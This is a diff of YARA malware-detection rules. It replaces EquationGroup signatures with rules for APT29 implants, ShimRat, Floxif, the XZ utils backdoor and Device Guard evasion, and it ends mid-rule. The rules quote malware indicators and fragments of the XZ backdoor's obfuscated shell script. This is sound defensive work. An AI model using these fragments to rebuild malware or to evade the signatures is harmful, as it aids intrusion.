+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1383-L1411"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0cd3ba351b1c5716ed322c9f177a848322324526f3d39c2be5cc34bc6aee9fa6"
-		score = 75
+		logic_hash = "437bda331405f9203747ffbfb107ec26e33973ebfc9f02e153697f7b8c22ad4f"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0654b4b8727488769390cd091029f08245d690dd90d1120e8feec336d1f9e788"
 
 	strings:
-		$s2 = "0M1U1Z1p1" fullword ascii
-		$s14 = "SPRQWV" fullword ascii
+		$DOTNET = "mscorlib" ascii
+		$REF_URL = "https://www.google.com/url?sa=" wide
+		$REF_var_1 = "&rct=" wide
+		$REF_var_2 = "&q=&esrc=" wide
+		$REF_var_3 = "&source=" wide
+		$REF_var_4 = "&cd=" wide
+		$REF_var_5 = "&ved=" wide
+		$REF_var_6 = "&url=" wide
+		$REF_var_7 = "&ei=" wide
+		$REF_var_8 = "&usg=" wide
+		$REF_var_9 = "&bvm=" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		( uint16( 0 ) == 0x5A4D ) and ( $DOTNET ) and ( $REF_URL ) and ( 3 of ( $REF_var* ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Rc5 : FILE
+rule SIGNATURE_BASE_IMPLANT_9_V1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "854c1726-4ba4-5464-a765-4dd154a1b166"
-		date = "2017-04-15"
+		description = "Onion Duke Implant by APT29"
+		author = "US CERT"
+		id = "5460ff29-681b-5d11-a6ba-5f294e8577e6"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3027-L3043"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1431-L1447"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6d9ba73fe2a6da99ba44b00bcb5ecf51e983ac245fd5c6e620d35e8120514464"
-		score = 75
+		logic_hash = "76704410af27060131ee4a5f46601b8badbf822d8084511145078607db715651"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "69e2c68c6ea7be338497863c0c5ab5c77d5f522f0a84ab20fe9c75c7f81318eb"
 
 	strings:
-		$s1 = "Usage: %s [d|e] session_key ciphertext" fullword ascii
-		$s2 = "where session_key and ciphertext are strings of hex" fullword ascii
-		$s3 = "d = decrypt mode, e = encrypt mode" fullword ascii
-		$s4 = "Bad mode, should be 'd' or 'e'" fullword ascii
+		$STR1 = { 8B 03 8A 54 01 03 32 55 FF 41 88 54 39 FF 3B CE 72 EE }
+		$STR2 = { 8B C8 83 E1 03 8A 54 19 08 8B 4D 08 32 54 01 04 40 88 54 38 FF
+         3B C6 72 E7 }
+		$STR3 = { 8B 55 F8 8B C8 83 E1 03 8A 4C 11 08 8B 55 FC 32 0C 10 8B 17 88
+         4C 02 04 40 3B 06 72 E3 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Level_Generic : FILE
+rule SIGNATURE_BASE_IMPLANT_10_V2 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7ff3d0b0-7a70-561e-9c45-d1f9dbccefe9"
-		date = "2017-04-15"
+		description = "CozyDuke / CozyCar / CozyBear Implant by APT29"
+		author = "US CERT"
+		id = "9c6d4eb9-98a5-5c6d-ba3a-0ce7524c5d2a"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3045-L3075"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1468-L1481"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ddb3441b62b477ab7e3406a22e2a246b60c1d1d25e4acf52ee452a2dfac2daf7"
-		score = 75
+		logic_hash = "dc201d25b1d6cf8f88ae3bee18057902c4d64316aa9debc9248b0d8aa7f6d170"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7a6488dd13936e505ec738dcc84b9fec57a5e46aab8aff59b8cfad8f599ea86a"
-		hash2 = "0e3cfd48732d0b301925ea3ec6186b62724ec755ed40ed79e7cd6d3df511b8a0"
-		hash3 = "d1d6e3903b6b92cc52031c963e2031b5956cadc29cc8b3f2c8f38be20f98a4a7"
-		hash4 = "25a2549031cb97b8a3b569b1263c903c6c0247f7fff866e7ec63f0add1b4921c"
-		hash5 = "591abd3d7ee214df25ac25682b673f02219da108d1384261052b5167a36a7645"
-		hash6 = "6b71db2d2721ac210977a4c6c8cf7f75a8f5b80b9dbcece1bede1aec179ed213"
-		hash7 = "7be4c05cecb920f1010fc13086635591ad0d5b3a3a1f2f4b4a9be466a1bd2b76"
-		hash8 = "f9cbccdbdf9ffd2ebf1ee84d0ddddd24a61dbe0858ab7f0131bef6c7b9a19131"
-		hash9 = "3cf7a01bdf8e73769c80b75ca269b506c33464d81f574ded8bb20caec2d4cd13"
-		hash10 = "a87a871fe32c49862ed68fda99d92efd762a33ababcd9b6b2b909f2e01f59c16"
 
 	strings:
-		$s1 = "wshtcpip.WSHGetSocketInformation" fullword ascii
-		$s2 = "\\\\.\\%hs" fullword ascii
-		$s3 = ".?AVResultIp@Mini_Mcl_Cmd_NetConnections@@" fullword ascii
-		$s4 = "Corporation. All rights reserved." fullword wide
-		$s5 = { 49 83 3c 24 00 75 02 eb 5d 49 8b 34 24 0f b7 46 }
-		$op1 = { 44 24 57 6f c6 44 24 58 6e c6 44 24 59 }
-		$op2 = { c6 44 24 56 64 88 5c 24 57 }
-		$op3 = { 44 24 6d 4c c6 44 24 6e 6f c6 44 24 6f }
+		$xor = { 34 ?? 66 33 C1 48 FF C1 }
+		$nop = { 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 2 of ( $s* ) or all of ( $op* ) )
+		uint16( 0 ) == 0x5A4D and $xor and $nop
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Level3_Http_Exe : FILE
+rule SIGNATURE_BASE_Unidentified_Malware_Two
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9bb4224e-f900-5f5c-8091-088a4b791ada"
-		date = "2017-04-15"
+		description = "Unidentified Implant by APT29"
+		author = "US CERT"
+		id = "848f2d1f-e352-51c1-ac5d-841bf309f2f2"
+		date = "2017-02-10"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3077-L3094"
+		reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_grizzlybear_uscert.yar#L1520-L1542"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "50d83b157c338830eea6aba2e09e9d513dd5b50e257d1a16c0d51616bfa26a7f"
-		score = 75
+		logic_hash = "cd9adfb9e27e4d6b27498cc029e15132343f036cca60210528720a533fe20d9a"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3e855fbea28e012cd19b31f9d76a73a2df0eb03ba1cb5d22aafe9865150b020c"
+		tags = ""
 
 	strings:
-		$s1 = "Copyright (C) Microsoft" fullword wide
-		$op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 }
-		$op2 = { 44 24 4e 41 88 5c 24 4f ff }
-		$op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 }
+		$my_string_one = "/zapoy/gate.php"
+		$my_string_two = { E3 40 FE 45 FD 0F B6 45 FD 0F B6 14 38 88 55 FF 00 55
+         FC 0F B6 45 FC 8A 14 38 88 55 FE 0F B6 45 FD 88 14 38 0F B6 45 FC 8A
+         55 FF 88 14 38 8A 55 FF 02 55 FE 8A 14 3A 8B 45 F8 30 14 30 }
+		$my_string_three = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb"
+		$my_string_four = { 8B CF 0F AF CE 8B C6 99 2B C2 8B 55 08 D1 F8 03 C8
+         8B 45 FC 03 C2 89 45 10 8A 00 2B CB 32 C1 85 DB 74 07 }
+		$my_string_five = "fuckyou1"
+		$my_string_six = "xtool.exe"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+		($my_string_one and $my_string_two ) or ( $my_string_three or $my_string_four ) or ( $my_string_five and $my_string_six )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Parsecapture : FILE
+rule SIGNATURE_BASE_Shimrat
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "11743260-c5ce-59de-9fcf-0c050eee98ff"
-		date = "2017-04-15"
+		description = "Detects ShimRat and the ShimRat loader"
+		author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
+		id = "21431895-1180-5552-8e82-1589992ffa1d"
+		date = "2015-11-20"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3096-L3111"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mofang.yar#L1-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8946bc6d1812a998757a4032755f37aa2be6121a958ebfb6fec90fa60da038fb"
+		logic_hash = "0dd19e6a65b06bd5846ec224f01c3feea066540317223d1991154b2305882b20"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c732d790088a4db148d3291a92de5a449e409704b12e00c7508d75ccd90a03f2"
+		tags = ""
 
 	strings:
-		$x1 = "* Encrypted log found.  An encryption key must be provided" fullword ascii
-		$x2 = "encryptionkey = e.g., \"00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff\"" fullword ascii
-		$x3 = "Decrypting with key '%02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x'" fullword ascii
+		$dll = ".dll"
+		$dat = ".dat"
+		$headersig = "QWERTYUIOPLKJHG"
+		$datasig = "MNBVCXZLKJHGFDS"
+		$datamarker1 = "Data$$00"
+		$datamarker2 = "Data$$01%c%sData"
+		$cmdlineformat = "ping localhost -n 9 /c %s > nul"
+		$demoproject_keyword1 = "Demo"
+		$demoproject_keyword2 = "Win32App"
+		$comspec = "COMSPEC"
+		$shim_func1 = "ShimMain"
+		$shim_func2 = "NotifyShims"
+		$shim_func3 = "GetHookAPIs"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them )
+		($dll and $dat and $headersig and $datasig ) or ( $datamarker1 and $datamarker2 ) or ( $cmdlineformat and $demoproject_keyword1 and $demoproject_keyword2 and $comspec ) or ( $dll and $dat and $shim_func1 and $shim_func2 and $shim_func3 )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Activedirectory_Target : FILE
+rule SIGNATURE_BASE_Shimratreporter
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1069cabe-7c09-522f-ad3f-05651490b921"
-		date = "2017-04-15"
+		description = "Detects ShimRatReporter"
+		author = "Yonathan Klijnsma (yonathan.klijnsma@fox-it.com)"
+		id = "01688b3c-2f06-518f-939d-4d65529be5ae"
+		date = "2015-11-20"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3113-L3127"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_mofang.yar#L28-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0dee634fe81870b21531046be512e9e54b127207c1910ca5ce5dfab63b1d0603"
+		logic_hash = "931d65628e5f0b7c63fe270b0a6cd3890f41a4ee7e253ce056b37f2d55542258"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "33c1b7fdee7c70604be1e7baa9eea231164e62d5d5090ce7f807f43229fe5c36"
+		tags = ""
 
 	strings:
-		$s1 = "(&(objectCategory=person)(objectClass=user)(cn=" fullword wide
-		$s2 = "(&(objectClass=user)(objectCategory=person)" fullword wide
+		$IpInfo = "IP-INFO"
+		$NetworkInfo = "Network-INFO"
+		$OsInfo = "OS-INFO"
+		$ProcessInfo = "Process-INFO"
+		$BrowserInfo = "Browser-INFO"
+		$QueryUserInfo = "QueryUser-INFO"
+		$UsersInfo = "Users-INFO"
+		$SoftwareInfo = "Software-INFO"
+		$AddressFormat = "%02X-%02X-%02X-%02X-%02X-%02X"
+		$proxy_str = "(from environment) = %s"
+		$netuserfun = "NetUserEnum"
+		$networkparams = "GetNetworkParams"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Legacy_Dll : HIGHVOL FILE
+rule SIGNATURE_BASE_Malware_Floxif_Mpsvc_Dll : HIGHVOL FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Malware - Floxif"
 		author = "Florian Roth (Nextron Systems)"
-		id = "254ff1f7-52ee-57fa-be02-2904e132e25c"
-		date = "2017-04-15"
+		id = "37af366a-24b2-5402-b0b5-6e2c80f8c903"
+		date = "2017-04-07"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3129-L3144"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_floxif.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "923a595737bc83fe05d0ca7301c70e1cb03cecf97dfa99f5967b77b892a9a533"
+		logic_hash = "e51258558dfd9a2c65589100a224492f4582067484c99d405b2d432a48cc6ed8"
 		score = 75
 		quality = 85
 		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0cbc5cc2e24f25cb645fb57d6088bcfb893f9eb9f27f8851503a1b33378ff22d"
+		hash1 = "1e654ee1c4736f4ccb8b5b7aa604782cfb584068df4d9e006de8009e60ab5a14"
 
 	strings:
-		$op1 = { 45 f4 65 c6 45 f5 6c c6 45 f6 33 c6 45 f7 32 c6 }
-		$op2 = { 49 c6 45 e1 73 c6 45 e2 57 c6 45 e3 }
-		$op3 = { 34 c6 45 e7 50 c6 45 e8 72 c6 45 e9 6f c6 45 ea }
+		$op1 = { 04 80 7a 03 01 75 04 8d 42 04 c3 8d 42 04 53 8b }
+		$op2 = { 88 19 74 03 41 eb ea c6 42 03 01 5b c3 8b 4c 24 }
+		$op3 = { ff 03 8d 00 f9 ff ff 88 01 eb a1 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Svctouch : FILE
+rule SIGNATURE_BASE_BKDR_Xzutil_Script_CVE_2024_3094_Mar24_1 : CVE_2024_3094
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a1246afa-32ba-5730-91a2-b1116160d662"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3146-L3159"
+		description = "Detects make file and script contents used by the backdoored XZ library (xzutil) CVE-2024-3094."
+		author = "Florian Roth"
+		id = "6b62ffc2-d0a7-5810-97a3-c48f7fac300e"
+		date = "2024-03-30"
+		modified = "2024-04-24"
+		reference = "https://www.openwall.com/lists/oss-security/2024/03/29/4"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/bkdr_xz_util_cve_2024_3094.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0e876611ffe4740141a0454f68cfc7dd3c46e0fd44deeb9f3e0f66c8fccd3745"
-		score = 75
+		hash = "d44d0425769fa2e0b6875e5ca25d45b251bbe98870c6b9bef34f7cea9f84c9c3"
+		logic_hash = "8d3f5f078a5c827208e04acb7ac1496f473e1236f92561f94d2a3c8156c68ea6"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "96b6a3c4f53f9e7047aa99fd949154745e05dc2fd2eb21ef6f0f9b95234d516b"
+		tags = "CVE-2024-3094"
 
 	strings:
-		$s1 = "Causes: Firewall,Machine down,DCOM disabled\\not supported,etc." fullword ascii
+		$x1 = "/bad-3-corrupt_lzma2.xz | tr " ascii
+		$x2 = "/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|" ascii
+		$x3 = "eval $zrKcKQ" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 10KB and 1 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Pwd_Implant : FILE
+rule SIGNATURE_BASE_BKDR_Xzutil_Binary_CVE_2024_3094_Mar24_1 : CVE_2024_3094 FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "69d071f0-7214-5972-805a-3c0c1d2346c2"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3161-L3176"
+		description = "Detects injected code used by the backdoored XZ library (xzutil) CVE-2024-3094."
+		author = "Florian Roth"
+		id = "6ccdeb6d-67c4-5358-a76b-aef7f047c997"
+		date = "2024-03-30"
+		modified = "2024-04-24"
+		reference = "https://www.openwall.com/lists/oss-security/2024/03/29/4"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/bkdr_xz_util_cve_2024_3094.yar#L19-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f565c42781ff4b0b37e7c00673fb2da2877018317cd415bdb47d4e019485c727"
+		logic_hash = "ed364484ff598b0818f9b3249673e684b52394c25b14e47fbca25a5f96ecc970"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ee72ac76d82dfec51c8fbcfb5fc99a0a45849a4565177e01d8d23a358e52c542"
+		tags = "CVE-2024-3094, FILE"
+		hash1 = "319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae"
+		hash2 = "605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4"
+		hash3 = "8fa641c454c3e0f76de73b7cc3446096b9c8b9d33d406d38b8ac76090b0344fd"
+		hash4 = "b418bfd34aa246b2e7b5cb5d263a640e5d080810f767370c4d2c24662a274963"
+		hash5 = "cbeef92e67bf41ca9c015557d81f39adaba67ca9fb3574139754999030b83537"
+		hash6 = "5448850cdc3a7ae41ff53b433c2adbd0ff492515012412ee63a40d2685db3049"
 
 	strings:
-		$s1 = "7\"7(7/7>7O7]7o7w7" fullword ascii
-		$op1 = { 40 50 89 44 24 18 FF 15 34 20 00 }
+		$op1 = { 48 8d 7c 24 08 f3 ab 48 8d 44 24 08 48 89 d1 4c 89 c7 48 89 c2 e8 ?? ?? ?? ?? 89 c2 }
+		$op2 = { 31 c0 49 89 ff b9 16 00 00 00 4d 89 c5 48 8d 7c 24 48 4d 89 ce f3 ab 48 8d 44 24 48 }
+		$op3 = { 4d 8b 6c 24 08 45 8b 3c 24 4c 8b 63 10 89 85 78 f1 ff ff 31 c0 83 bd 78 f1 ff ff 00 f3 ab 79 07 }
+		$xc1 = { F3 0F 1E FA 55 48 89 F5 4C 89 CE 53 89 FB 81 E7 00 00 00 80 48 83 EC 28 48 89 54 24 18 48 89 4C 24 10 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 1 of them )
+		uint16( 0 ) == 0x457f and ( all of ( $op* ) or $xc1 )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Kisucomms_Target_2000 : FILE
+rule SIGNATURE_BASE_BKDR_Xzutil_Killswitch_CVE_2024_3094_Mar24_1 : CVE_2024_3094
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "693a82e5-a3f1-5a56-b33d-0daef36bbe5f"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3178-L3198"
+		description = "Detects kill switch used by the backdoored XZ library (xzutil) CVE-2024-3094."
+		author = "Florian Roth"
+		id = "0d28bec4-1d3a-5af0-9e9e-49486fcc62e1"
+		date = "2024-03-30"
+		modified = "2024-04-24"
+		reference = "https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01?permalink_comment_id=5006558#gistcomment-5006558"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/bkdr_xz_util_cve_2024_3094.yar#L48-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7d350228ad779d0453c1077afb2b533036eb1e43e4f74a433d68c781db963ab1"
-		score = 75
+		logic_hash = "b2024d4b8346c4f74524bb7f3c6b2850684c19471a00e6fa60fff1c41e4a86b6"
+		score = 85
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "94eea1bad534a1dc20620919de8046c9966be3dd353a50f25b719c3662f22135"
+		tags = "CVE-2024-3094"
 
 	strings:
-		$s1 = "363<3S3c3l3q3v3{3" fullword ascii
-		$s2 = "3!3%3)3-3135393@5" fullword ascii
-		$op0 = { eb 03 89 46 54 47 83 ff 1a 0f 8c 40 ff ff ff 8b }
-		$op1 = { 8b 46 04 85 c0 74 0f 50 e8 34 fb ff ff 83 66 04 }
-		$op2 = { c6 45 fc 02 8d 8d 44 ff ff ff e8 d2 2f 00 00 eb }
+		$x1 = "yolAbejyiejuvnup=Evjtgvsh5okmkAvj"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) or all of ( $op* ) ) )
+		$x1
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Sldecoder : FILE
+rule SIGNATURE_BASE_SUSP_OBFUSC_SH_Indicators_Mar24_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1760e84b-fc40-5d60-9351-3a3134af9e9f"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3200-L3214"
+		description = "Detects characteristics found in obfuscated script (used in the backdoored XZ package, but could match on others, too)"
+		author = "Florian Roth"
+		id = "f9fcc326-75d6-5a5a-a8b5-7de15a11448e"
+		date = "2024-04-06"
+		modified = "2024-04-24"
+		reference = "https://www.openwall.com/lists/oss-security/2024/03/29/4/1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/bkdr_xz_util_cve_2024_3094.yar#L62-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "81a74169dc8f93f314f384bd859df07a4ffaaf430b221b440de922fad3497535"
-		score = 75
+		logic_hash = "b5abf8184e0b1b18ccc513e00e9db241b4983923ae97f495396d73f0fb162192"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b220f51ca56d9f9d7d899fa240d3328535f48184d136013fd808d8835919f9ce"
 
 	strings:
-		$x1 = "Error in conversion. SlDecoder.exe <input filename> <output filename> at command line " fullword wide
-		$x2 = "KeyLogger_Data" fullword wide
+		$s1 = "eval $"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		uint8( 1 ) == 0x3d and $s1 in ( filesize -20 .. filesize )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Windows_Implant : FILE
+rule SIGNATURE_BASE_SUSP_Deviceguard_WDS_Evasion : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects WDS file used to circumvent Device Guard"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a82aac49-8843-5420-8b87-f3d7431bc63f"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3216-L3229"
+		id = "469b60d4-43d3-5a85-aa51-e453d8c858c0"
+		date = "2015-01-01"
+		modified = "2023-01-06"
+		reference = "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_deviceguard_evasion.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5b6b349c98a328b4bbdd6d8718af8477c36ec219bb0076dd56998395d0ef5f32"
-		score = 75
+		logic_hash = "4be9d7c34f7bafeb53db4fc1262a3692493b2253b0de7dc97480b01b62a9f12c"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d38ce396926e45781daecd18670316defe3caf975a3062470a87c1d181a61374"
 
 	strings:
